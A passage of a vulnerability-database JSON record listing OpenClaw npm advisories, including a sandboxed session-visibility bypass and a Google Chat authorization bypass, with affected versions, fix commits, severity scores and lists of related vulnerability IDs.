"GHSA-2w79-r9g8-wmcr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2w79-r9g8-wmcr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41400", "GHSA-2w79-r9g8-wmcr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9xrt-mv81-3yc8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91090?format=api", "vulnerability_id": "VCID-9yxw-fj1c-tff9", "summary": "OpenClaw: `session_status` sessionId resolution bypasses sandboxed session-tree visibility\n## Summary\n\n`session_status` sessionId resolution bypasses sandboxed session-tree visibility\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.3.11, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\n`session_status` previously resolved a `sessionId` to a canonical session key after early visibility checks, letting sandboxed children reach parent or sibling sessions that were blocked by explicit `sessionKey`. Commit `d9810811b6c3c9266d7580f00574e5e02f7663de` enforces visibility after `sessionId` resolution so sandboxed callers cannot escape their session tree.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d9810811b6c3c9266d7580f00574e5e02f7663de`.\n\n## Fix Commit(s)\n\n- `d9810811b6c3c9266d7580f00574e5e02f7663de`", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d9810811b6c3c9266d7580f00574e5e02f7663de" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2qc-744p-66r2" }, { "reference_url": "https://github.com/advisories/GHSA-q2qc-744p-66r2", "reference_id": "GHSA-q2qc-744p-66r2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q2qc-744p-66r2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-q2qc-744p-66r2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9yxw-fj1c-tff9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91406?format=api", "vulnerability_id": "VCID-a2p8-ydn6-3bbr", "summary": "OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n## Summary\n\nGoogle Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGoogle Chat group authorization previously relied on mutable space display names, which allowed policy rebinding when names changed or collided. Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`.\n\n## Fix Commit(s)\n\n- `11ea1f67863d88b6cbcb229dd368a45e07094bff`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35617", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20285", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20323", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20333", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35617" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35617", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35617" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname" }, { "reference_url": "https://github.com/advisories/GHSA-52q4-3xjc-6778", "reference_id": "GHSA-52q4-3xjc-6778", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-52q4-3xjc-6778" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": 